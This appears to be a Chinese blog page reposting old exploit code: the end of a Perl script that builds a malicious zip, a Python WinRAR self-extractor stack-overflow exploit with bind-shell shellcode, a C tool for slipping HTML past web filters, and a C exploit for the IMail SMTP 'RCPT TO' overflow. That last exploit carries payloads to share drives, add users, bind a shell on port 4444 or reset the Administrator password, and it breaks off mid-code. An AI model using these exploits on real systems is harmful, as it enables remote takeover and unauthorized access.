"\x87\xB4\xDA\xE3\xB4\xBC\x8D\x82\xB7\x42\xF0\x36\x8A\xEF\x84\x76\x52\xEB\xF4\x3D\xC4\x1B\x2E\x78\xF3\x05\x6F\xCF\x50\x2A\xCC\x9D\x52\xAF\xAE\x4C".
"\x9A\x29\x55\xC2\xB0\x5B\xCF\x03\xC3\x94\xA9\x89\xE4\xCA\x5F\xCD\xE9\x2A\xF8\x50\x9B\xA4\x2A\x59\xA1\x7E\x98\x03\xF8\x10\xAE\xC7\x95\x43\xB5\x16".
"\xA0\x42\xA4\x62\x9B\x3F\xAA\xE2\xF3\x15\xEF\xE6\x4C\xDE\x9A\xDB\x85\x44\x26\x53\x8A\xD9\x6A\xB1\x9A\xCC\x96\xFB\xEF\x52\x1B\x74\xA7\x2E\x47\x13".
"\x81\x8F\xB9\x0F\x5D\x9A\x1B\x9F\x68\xEE\xE0\xDC\xD0\x27\xD3\x32\x75\xF8\xC0\x5D\x0C\xD1\x74\xC8\x31\x91\xD5\x2A\x99\xA4\x61\x29\x26\xAB\x7E\x5C".
"\x2A\x93\xFA\xD0\xC9\x97\x06\x74\x0D\xAD\xE8\xA6\x82\x6A\xE7\x58\x76\xBD\xAA\x3D\x3D\xC5\x62\x62\x0C\xA8\x7D\xAE\xDA\x6D\x89\x0E\x75\x76\x8A\xAA".
"\x89\x12\x90\x19\xE7\xEE\xE4\xCB\x4A\xB5\xDB\x6A\xC6\xE7\x5D\xD8\x11\x84\xAD\xE3\xD2\x9E\xEE\xBC\x5B\x02\x2A\x71\x4F\x54\xED\x8E\xC2\x28\x2B\x0F".
"\x99\x64\x74\xF8\x62\xF8\x24\xA3\x0C\x6E\xAD\x1B\x4D\x5E\x2F\x4B\x53\xBA\x7A\xBB\xF3\x33\x21\x99\x46\x96\xC6\x25\xB8\xF9\x2C\xE5\x2D\xC2\x80\xA6".
"\x09\x32\xB9\xF3\x8F\xF4\xDE\x5D\x89\x86\x3A\x37\x75\xE3\x68\xA2\x57\x31\xEA\xF4\xAA\x92\x0E\x95\x6D\xDF\xF0\x69\xCD\xF6\x14\x4A\xAD\xB7\xDB\xD4".
"\xF6\xB3\x13\xE1\x0F\xDA\x78\x1C\xC2\xB5\x6C\xA1\x7B\xBB\x72\xFA\x85\xE6\x68\x7A\xC6\xEB\xE3\x3A\x4B\xBF\x2C\x18\x18\x04\x4A\xA7\x9D\xEA\x9F\x9E".
"\x2E\xF8\x4D\xC0\x13\x0B\xA7\x38\xB8\x56\x76\xAF\xFA\xAC\x2D\xFF\x3C\x53\xFA\x05\xEA\xB5\xE0\x08\x9F\x98\x95\x6E\x21\xFA\xD0\xA2\x1E\xB9\xFE\xEE".
"\x40\x54\x3F\x62\x4A\x96\x76\xB7\x15\x6D\x55\x37\x02\x96\x5E\xBF\x19\x03\xAC\x76\x75\x90\x65\xC0\x80\x81\x2B\x04\x27\x31\xCC\xC0\x88\xA0\x5F\x38".
"\x7F\x8B\x0E\xDC\xF7\xE4\xD1\x13\x4B\xBD\x99\x3B\x1E\x4A\xA5\x29\x37\x3C\xFF\x9E\x03\x61\xED\x88\xC8\xD2\xE2\x79\x0C\xCB\x77\x3E\x45\x62\xBB\xCF".
"\x6E\x12\x7D\xCC\x0B\x44\x6A\x07\xF4\x26\xA9\x43\x56\x7A\x97\xC4\x40\xE6\x43\x12\x23\xB0\x63\xC4\xB3\x50\x21\x84\x65\xF1\x2C\x9D\xC7\xBA\x05\x92".
"\x18\xE7\x4E\x93\xB4\x93\xD4\x12\xCF\x1B\xD1\x51\x4A\xFC\x77\x08\x88\x6E\x87\xCD\x7F\x29\x60\xB5\x24\xC6\x12\xDC\x39\x62\x38\x4C\x21\x49\xE4\x83".
"\x3F\x86\x79\x9A\xCE\x30\x03\xDD\x7F\x1E\x69\x93\x75\x78\xF3\xB4\x7C\xA9\x51\xA7\x89\x8B\x77\x73\x7E\x97\x04\xC3\xAD\x4E\xBF\x90\xC9\xE5\x6A\x6F".
"\x6F\x57\xDD\xAC\x6B\x16\x09\x37\x77\xB2\x09\xBB\xFD\x4B\x1C\x45\x0E\x1E\x01\x62\x7C\x3F\x26\x8F\x65\xAA\xEE\x77\x47\xBD\xBA\xD5\x32\xC7\xA4\xBA".
"\xDF\x7A\xF7\xB9\x45\x4F\xBF\x26\xA9\xEE\x3D\x35\xD7\xF2\x69\x71\xB3\xA6\x9F\x6D\xEE\xC6\xD9\xE6\xAE\xBC\x6F\x4D\xC6\x80\x01\x03\x06\x0C\x18\x30".
"\x60\xC0\x80\x01\x03\x06\x0C\x18\x18\x3A\x06\x9A\xFF\x73\x88\xE9\x9D\x3F\xBD\xB3\xB5\xE8\x9A\xCC\x2D\x8F\x60\xFE\x3F\xF5\xC4\x2F\xAB\x11\x66\x4D".
"\x08\xE3\xB9\xFA\x11\x12\xF3\x75\x9E\xBF\x7A\x49\xCC\xD1\x43\x24\xE6\xDA\x9D\x24\xE6\xE3\x1B\x49\xEC\x18\xE8\x22\xB1\x93\x82\xD7\x0E\x78\xAE\xFF".
"\x14\x89\xB9\xFC\x33\x24\xE6\xF2\xBB\x49\xFC\x55\xAF\x3D\x24\xE6\xFE\x7B\x35\xD9\x7F\x21\x91\xA7\x4F\xBE\x16\xF3\x71\x9E\x9F\x87\xC5\x24\x5F\x9D".
"\x23\xF3\x3C\xDC\xAC\xE9\x64\x7B\x7A\xBA\xB0\x0F\x5E\x9D\x46\xFA\x1A\xED\x40\x76\x5E\xA6\xC8\x7B\xDF\xBA\x41\x46\xA6\xD0\xA6\xAF\x26\x2C\xF7\x45".
"\xFD\x6E\xD2\xE7\xE8\x8B\xB2\xFB\xE6\xE5\xB2\x16\x36\x93\xC4\x1D\x15\x9A\x9F\xDD\x9C\xEF\xC6\xBA\x9A\xEA\xC6\x05\x7C\x32\xBE\xA1\x37\xFF\x73\x61".
"\x5B\xB4\xDF\xF1\x58\xCE\x1C\x1A\xAE\xDA\x3A\x89\xFA\xCA\x32\x8E\xC4\x5F\x7D\x1B\xEA\xBE\x91\x71\xD4\xB7\x59\x81\x65\x7A\xA9\xF8\x14\x1D\x89\xBA".
"\x1C\x36\xE3\x88\xD6\x95\x67\x92\x1D\x8D\x31\x8C\x61\x2E\x06\x93\xEC\x50\x87\x61\x0C\x73\x39\x9A\x64\x47\x38\x2E\x76\x93\xAC\x7C\x97\x67\xA9\x0D".
"\x63\x98\x73\x63\x92\x1D\x2E\x31\x8C\x61\x0C\xF3\x4D\x8D\x71\x44\xCB\x38\xA2\x75\x65\x99\x0B\x73\x44\x2B\x7E\x4D\xCA\xC0\x85\x85\xBE\x56\xC9\x6B".
"\x80\xBC\xC7\x89\xD7\x01\x79\xC5\x93\xD7\x57\x79\xAF\x16\xEF\xD3\xE2\xBD\x59\xBC\x56\xCA\xEB\x95\xBC\x26\xCB\xFF\xEF\x87\xD7\x78\x33\x49\xAC\xE9".
"\xF2\x1E\x2E\x5E\xBB\xE5\x35\x58\xDE\xB9\xCD\xEB\xB7\xA3\xB4\x74\x57\x93\x7A\x38\x87\xAE\x21\xB1\x8E\x79\x2D\x89\x55\xD5\x71\x5A\xFC\x78\xD8\x13".
"\xC0\xEB\x48\xFC\xF7\x93\x89\xE0\xF5\xE0\x0D\x5A\xFC\x24\xD8\x93\x89\x4F\x96\x11\x4D\x05\x0B\xC1\x22\x90\xDB\x91\x03\x2C\x01\x4B\xB5\xB4\x5F\x83".
"\xD3\x35\xB7\x4E\x03\x67\x06\x6F\x84\x0F\xAA\xA7\xEA\xE6\xA9\xE7\xE7\xC2\xD4\x41\x83\x41\x2E\x59\x25\x5D\x16\xB7\xA1\x14\x9B\xF8\x2D\x61\xAF\x88".
"\x9E\x1F\x9F\xB6\xE2\x37\xEB\xD4\xFF\x8C\x72\x23\x69\xFB\xFF\x89\x4F\xFC\x39\xD5\x93\x6E\x43\x45\x1A\x99\x7A\xF5\x33\x92\xA5\x67\xF0\x5E\xC2\x67".
"\xB2\x85\xBB\x24\xEE\x5C\xE0\x50\x30\x1C\xFA\xF5\xDF\x0E\xCE\x56\xFF\x68\xBE\x64\x0A\xF7\x4A\x75\x1D\xDF\x85\x7A\x08\x52\x13\xB5\xA9\x07\x15\xF4".
"\x73\x8C\x67\x83\x31\xD0\xCF\x35\xCE\xEF\xED\xD9\xEA\x67\xF0\xFF\x6D\x62\x58\xA9\x41\xD5\xCA\xBF\x1C\xF0\xB3\xE7\xD3\x76\x9E\xDE\xD3\x91\xFA\x09".
"\xBE\x81\x51\x30\x84\xFA\x97\xF9\x92\x29\xDC\xD6\x7E\x25\x1F\x5C\x7E\x66\x42\x3F\x7F\xB7\x06\xA3\xBF\x00\xEC\xD4\x4E\x47\x48\x54\xA5\xFE\x52\x12".
"\xA2\xA5\x68\x05\x2D\x67\xBC\xEF\x74\xC8\x52\x8F\xEA\x0C\xAE\xFC\x8C\xC1\x6B\x1A\x18\x43\xD1\xAF\x83\xDB\xAE\xF1\x9D\xBC\x72\x21\xE1\xE9\x9B\xD3".
"\x44\x1B\x4A\xFC\x76\xF3\x77\x2A\x61\x6F\x73\x75\xB0\xA9\xAD\xD5\x1D\x88\xAA\x63\x82\xC5\x0D\x1C\x86\x20\xF5\x65\x66\x77\x91\x1E\x5F\x34\x93\x8E".
"\xCD\xFA\xD5\xBA\xD3\x36\x39\x03\x17\x11\xFE\x0F\x50\x4B\x01\x02\x14\x0B\x14\x00\x00\x00\x08\x00\x99\x3D\xE9\x34\xD6\xA6\xCB\xA3\xA9\x0D\x00\x00".
"\x00\x72\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x77\x6F\x72\x64\x68\x6C\x69\x6E\x6B\x2E\x64\x6F\x63\x50".
"\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x3B\x00\x00\x00\xD4\x0D\x00\x00\x00\x00";

open(olly, ">unzipme!.zip") || die "Can't Write temporary File\n";
binmode (olly);
print olly $all;
close (olly);
print "zip file ready, have
 fun..\n";


分类: 矩阵毒刺 标签:

WinRAR <= 3.60 beta 6 Local Stack Overflow Exploit

2006年11月6日 没有评论 47 views

"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
======================================================

Tested Version(s)..: WinRAR 3.60 beta 4
Original Author.............: posidron
Shellcode Stuffing .........: muts

"""

import os, sys

winrar__ = 'C:\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */

sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
sc +="\x4f\x4f\x42\x4d\x5a"

buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2

try:
    info = open(sfxnfo__, "w+b")
    info.write(buf)
    info.close()
except IOError:
    sys.exit("Error: unable to create: " + sfxnfo__)

print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
#os.spawnv(os.P_WAIT, result__, [result__, ""])
#print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."

# milw0rm.com [2006-07-05]

分类: 矩阵毒刺 标签:

HTML通用免杀

2006年10月24日 没有评论 100 views

#include <stdio.h>
int main(int argc,char** argv)
{
FILE *fp;
char ch;
printf("\n-- Bypassing of web filters by using ASCII Exploit By CoolDiyer --\n");
if(argc<2){
  printf("\nUsage: \n\t %s srcfile >destfile\n",argv[0]);
  return -1;
}
if((fp=fopen(argv[1],"r"))==NULL){
  printf("File %s open Error",argv[1]);
  return -1;
}//指定编码为US-ASCII是必须的
printf("\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=US-ASCII\" />\n<title>Bypassing of web filters by using ASCII Exploit By CoolDiyer</title>\n</head><body>\n");
while((ch=fgetc(fp))!=EOF){
  ch|=0x80; //把7位变成8位,这句话是核心,呵呵
  printf("%c",ch);
};
fclose(fp);
printf("\n</body></html>\n");
return -1;
}


用法:ascii.exe ie.htm >a.htm

分类: 矩阵毒刺 标签:

Ipswitch Imail Server 2006 / 8.x (rcpt) Remote Stack Overflow Exploit

2006年10月22日 没有评论 60 views

// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update


#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[1028];



// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)

/* win32_exec -  EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58"
"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46"
"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69"
"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89"
"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62"
"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34"
"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c"
"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5"
"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac"
"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc"
"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26"
"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad";


/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
unsigned char Win32Bind[] =
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93"
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9"
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd"
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf"
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e"
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd"
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd"
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66"
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6"
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34"
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65"
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7"
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e"
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f"
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61"
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66"
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b"
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9"
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67"
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6"
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69"
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";

/* win32_adduser -  PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char AddUser[] =
"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f"
"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23"
"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67"
"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c"
"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e"
"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1"
"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02"
"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e"
"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f"
"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18"
"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c"
"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a"
"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f"
"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a";

/* win32_exec -  CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
unsigned char ChangeAdmin[] =
"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74"
"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff"
"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3"
"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7"
"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc"
"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e"
"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31"
"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2"
"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe"
"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf"
"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba";


   WSADATA wsaData;

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen, i, JMP;
   char *hostname;
   unsigned short port;

   printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n");
   printf("Coded by Greg Linares < glinares.code  [at] GMAIL [dot] com >\n");
   if (argc <= 1)
   {
        printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]);
          printf("Default port is 25 \r\n");
        printf("==============================\n");
          printf("Payload Options: 1 = Default\n");
        printf("==============================\n");
          printf("1 = Share C:\\ as 'Export' Share\n");
          printf("2 = Add User 'Error' with Password 'Error'\n");
          printf("3 = Win32 Bind CMD to Port 4444\n");
        printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
        printf("==============================\n");
          printf("JMP Options: 1 = Default\n");
     &
nbsp;  printf("==============================\n");
          printf("1 = IMAIL 8.x SMTPDLL.DLL       [pop ebp, ret] 0x10036f71 \n");
        printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n");
        printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n");
        printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n");
        printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n");
        printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n");
        printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n");
        printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n");

      exit(0);
       }

       hostname = argv[1];
       if (argv[2]) port = atoi(argv[2]);
           else port = atoi("25");
       if (argv[4]) JMP = atoi(argv[4]);
        else JMP = atoi("1");

       if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
       {
        fprintf(stderr, "Error setting up with WinSock v1.1\n");
          exit(-1);
       }


       hp = gethostbyname(hostname);
       if (hp == NULL)
       {
          printf("ERROR: Uknown host %s\n", hostname);
          printf("%s",hostname);
          exit(-1);
       }

       sockin.sin_family = hp->h_addrtype;
       sockin.sin_port = htons(port);
       sockin.sin_addr = *((struct in_addr *)hp->h_addr);

       if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
       {
          printf("ERROR: Socket Error\n");
          exit(-1);
       }

       if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
       {
          printf("ERROR: Connect Error\n");
          closesocket(sockfd);
          WSACleanup();
          exit(-1);
       }

       printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);


       if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
       {
          printf("ERROR: Recv Error\n");
          closesocket(sockfd);
          WSACleanup();
          exit(1);
       }

       /* wait for SMTP service welcome*/
       buf[bytes] = '\0';
       check = strstr(buf, "220");
       if (check == NULL)
       {
          printf("ERROR: NO  response from SMTP service\n");
          closesocket(sockfd);
          WSACleanup();
          exit(-1);
       }


   // JMP to EAX = Results in a Corrupted Stack
   // so instead we POP EBP, RET to restore pointer and then return
   // this causes code procedure to continue
   /*
           ['IMail 8.x Universal', 0x10036f71 ],
        ['Windows 2003 SP1 English', 0x7c87d8af ],
        ['Windows 2003 SP0 English', 0x77d5c14c ],
        ['Windows XP SP2 English', 0x7c967e23 ],
        ['Windows XP SP1 English', 0x71ab389c ],
        ['Windows XP SP0 English', 0x71ab389c ],
        ['Windows 2000 Universal English', 0x75021397 ],
        ['Windows 2000 Universal French', 0x74fa1397],
        ['Windows XP SP1 - SP2 German', 0x77d18c14],
    */
       char Exp[] = "RCPT TO: <@";                        // This stores our JMP between the @ and :
       char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; &
nbsp;      //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
      char WinXPSP2E[] = "\x23\x7e\x96\x7c:";            //WinXP SP2 English  NTDLL.DLL [pop ebp, ret] 0x7c967e23
